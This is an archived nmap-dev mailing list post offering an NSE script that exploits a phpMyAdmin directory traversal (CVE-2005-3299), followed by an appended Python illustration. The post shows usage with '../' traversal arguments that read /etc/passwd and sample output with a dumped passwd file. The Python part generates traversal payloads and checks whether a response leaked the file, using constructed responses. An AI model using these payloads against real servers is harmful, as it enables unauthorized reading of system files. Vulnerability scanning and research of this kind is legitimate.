Nmap Development mailing list archives

[NSE] http-phpmyadmin-dir-traversal


From: Meshcheryakov Alexey <tank1st99 () gmail com>
Date: Wed, 20 Mar 2013 14:12:40 +0400

Hi nmap-dev,
attached is a script which exploits a directory traversal
vulnerability in phpMyAdmin 2.6.4-pl1. I wrote this script for
training purposes. Maybe it will be useful for someone.
-- @usage
-- nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip>
-- nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip>
--
-- @args http-phpmyadmin-dir-traversal.file Remote file to retrieve. Default: <code>../../../../../etc/passwd</code>
-- @args http-phpmyadmin-dir-traversal.outfile Output file
-- @args http-phpmyadmin-dir-traversal.dir Basepath to the services page. Default: <code>/phpMyAdmin-2.6.4-pl1/</code>
---
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
-- | http-phpmyadmin-dir-traversal:
-- |   VULNERABLE:
-- |   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2005-3299
-- |     Description:
-- |       PHP file inclusion vulnerability in grab_globals.lib.php in
-- |       phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include
-- |       local files via the $__redirect parameter, possibly involving the
-- |       subform array.
-- |
-- |     Disclosure date: 2005-10-nil
-- |     Extra information:
-- |       ../../../../../../../../etc/passwd :
-- |   root:x:0:0:root:/root:/bin/bash
-- |   daemon:x:1:1:daemon:/usr/sbin:/bin/sh
-- |   bin:x:2:2:bin:/bin:/bin/sh
-- |   sys:x:3:3:sys:/dev:/bin/sh
-- |   sync:x:4:65534:sync:/bin:/bin/sync
-- |   games:x:5:60:games:/usr/games:/bin/sh
-- |   man:x:6:12:man:/var/cache/man:/bin/sh
-- |   lp:x:7:7:lp:/var/spool/lpd:/bin/sh
-- |   mail:x:8:8:mail:/var/mail:/bin/sh
-- |   news:x:9:9:news:/var/spool/news:/bin/sh
-- |   uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
-- |   proxy:x:13:13:proxy:/bin:/bin/sh
-- |   www-data:x:33:33:www-data:/var/www:/bin/sh
-- |   backup:x:34:34:backup:/var/backups:/bin/sh
-- |   list:x:38:38:Mailing List Manager:/var/list:/bin/sh
-- |   irc:x:39:39:ircd:/var/run/ircd:/bin/sh
-- |   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
-- |   nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
-- |   libuuid:x:100:101::/var/lib/libuuid:/bin/sh
-- |   syslog:x:101:103::/home/syslog:/bin/false
-- |   sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
-- |   dps:x:1000:1000:dps,,,:/home/dps:/bin/bash
-- |   vboxadd:x:999:1::/var/run/vboxadd:/bin/false
-- |   mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
-- |   memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false
-- |   ../../../../../../../../etc/passwd saved to passwd.txt
-- |
-- |     References:
-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
-- |_      http://www.exploit-db.com/exploits/1244/

Regards, Alexey Meshcheryakov

Attachment: http-phpmyadmin-dir-traversal.nse
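The script above reports "VULNERABLE (Exploitable)" only when the traversal actually returns the requested file, so the interesting part of any such check is how it builds the candidate `../` paths and how it decides that the response body really is the target file rather than a login page or an error. The following Python is an added example that illustrates that logic generically; it is not the author's NSE code, does not reproduce the phpMyAdmin request itself, and the response bodies are constructed inline (the passwd lines are taken from the @output shown in the post) instead of being fetched over HTTP.

```python
import re

# Constructed sample responses standing in for HTTP bodies: a leaked /etc/passwd
# (first lines copied from the post's @output) and an ordinary phpMyAdmin page.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    "www-data:x:33:33:www-data:/var/www:/bin/sh\n"
)
SAMPLE_HTML = "<html><body><h1>phpMyAdmin</h1><form>login</form></body></html>"

# One passwd(5) record: name:password:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(
    r"^[A-Za-z_][A-Za-z0-9_.-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M
)


def traversal_payloads(target, min_depth=3, max_depth=8):
    """Return candidate traversal strings '../' * depth + target for each depth.

    The post's default is five levels, the usage example eight; the right
    depth depends on where the vulnerable include lives, so a scanner tries a range.
    """
    target = target.lstrip("/")
    return [("../" * depth) + target for depth in range(min_depth, max_depth + 1)]


def looks_like_passwd(body, min_entries=2):
    """True if the body contains at least min_entries passwd-style records.

    Requiring several records (not just the substring 'root:') avoids flagging
    pages that merely echo the requested filename back in an error message.
    """
    return len(PASSWD_LINE.findall(body)) >= min_entries


def assess(responses, target="/etc/passwd"):
    """Given a mapping payload -> response body (here constructed, normally
    fetched), return (payload, body) for the first payload that leaked the
    target file, or None if no depth worked."""
    for payload in traversal_payloads(target):
        body = responses.get(payload)
        if body is not None and looks_like_passwd(body):
            return payload, body
    return None


def save_leaked_file(body, outfile):
    """Write the retrieved body to outfile, mirroring the script's outfile arg."""
    with open(outfile, "w", encoding="utf-8") as fh:
        fh.write(body)
    return outfile


if __name__ == "__main__":
    # Constructed results: three levels hit a normal page, eight levels leaked the file.
    fake_responses = {
        "../../../etc/passwd": SAMPLE_HTML,
        "../../../../../../../../etc/passwd": SAMPLE_PASSWD,
    }
    hit = assess(fake_responses)
    if hit:
        payload, body = hit
        print("VULNERABLE (Exploitable):", payload)
        print(body)
    else:
        print("Not vulnerable or wrong traversal depth")
```

The content check is what separates a confident "Exploitable" verdict from a false positive: a server that simply reflects the path, or serves its login page for any URL, fails the record-count test even though the HTTP status was 200.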
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
